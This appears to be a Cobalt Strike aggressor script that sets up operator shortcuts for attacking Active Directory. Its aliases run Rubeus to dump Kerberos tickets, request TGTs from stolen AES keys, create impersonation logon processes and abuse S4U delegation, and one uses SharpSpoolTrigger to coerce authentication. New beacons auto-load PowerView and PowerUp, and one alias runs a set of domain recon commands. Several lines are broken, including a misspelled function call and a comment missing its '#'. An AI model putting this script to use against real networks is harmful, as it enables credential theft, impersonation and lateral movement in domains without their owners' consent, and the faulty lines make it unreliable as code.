$RUBEUSLOCATION = "C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe"; # location of Rubeus
$SHARP = "C:\\Tools\\SharpSystemTriggers\\SharpSpoolTrigger\\bin\\Release\\SharpSpoolTrigger.exe"; # location of SharpSpoolTrigger


alias SharpSpoolTrigger {
    bexecute_assembly($1, $SHARP, "$2 $3"); #use to trigger connection between machines for the sake of generating kerberos tickets
}

alias dump {
    bexecute_assembly($1, $RUBEUSLOCATION, "dump /nowrap"); # dump all tickets
}

alias dumpluid {
    bexecute_assembly($1, $RUBEUSLOCATION, "dump /luid:$2 /nowrap"); # dump tickets of given luid
}

alias triage {
    bexecute_assembly($1, $RUBEUSLOCATION, "triage"); # view Rubeus Triage
}

alias asktgt {
    bexecute_assembly($1, $RUBEUSLOCATION, "asktgt /user:$2 /aes256:$3 /nowrap"); # ask for a ticket based on aes256 key
}

alias CreateNetOnly {
    bexecute_assembly($1, $RUBEUSLOCATION, "createnetonly /program:$2"); # create a new process to import a ticket
}

alias CreateNetOnlyImpersonate {
    bexecute_assembly($1, $RUBEUSLOCATION, "createnetonly /program:$2 /domain:$3 /username:$4 /password:$5"); # create a new process and impersonate a user 
}

alias s4u {
    bexeute_assembly($1, $RUBEUSLOCATION, "s4u /impersonateuser:$2 /self /altservice:$3 /user:$4 /ticket:$5 /nowrap"); # S4UToSelf abuse
}

alias altservice {
    bexecute_assembly($1, $RUBEUSLOCATION, "s4u /impersonateuser:$2 /msdsspn:$3 /altservice:$4 /user:$5 /ticket:$6 /nowrap"); # S4UToSelf abuse with alternate service, great for getting other services
}

on beacon_initial {
   bpowershell_import($1, "C:\\Tools\\PowerSploit\\Recon\\PowerView.ps1"); # import PowerView into beacon so domain recon can be done
   bpowershell_import($1, "C:\\Tools\\PowerSploit\\Privesc\\PowerUp.ps1"); # import PowerUp into beacon so privesc can be discovered and abused
}

alias import-powerview {
    bpowershell_import($1, "C:\\Tools\\PowerSploit\\Recon\\PowerView.ps1"); # quickly import-powerview comment out if you plan on using initial beacon
}

alias import-powerup {
    bpowershell_import($1, "C:\\Tools\\PowerSploit\\Privesc\\PowerUp.ps1"); # quickly import powerup comment out if you on using initial beacon
}

alias domain-recon {
    bpowerpick($1, 'Get-Domain');
    bpowerpick($1, 'Get-DomainController | select Forest, Name, OSVersion | fl'); # run all domain recon powerview cmdlets
    bpowerpick($1, 'Get-ForestDomain');
    bpowerpick($1, 'Get-DomainPolicyData | select -expand SystemAccess');
    bpowerpick($1, 'Get-DomainTrust');
    bpowerpick($1, 'Get-DomainForeignGroupMember');
}

alias DomainUserProperties {
    bpowerpick($1, 'Get-DomainUser -Identity -Properties DisplayName, MemberOf | fl'); quickly get domain user properties
}
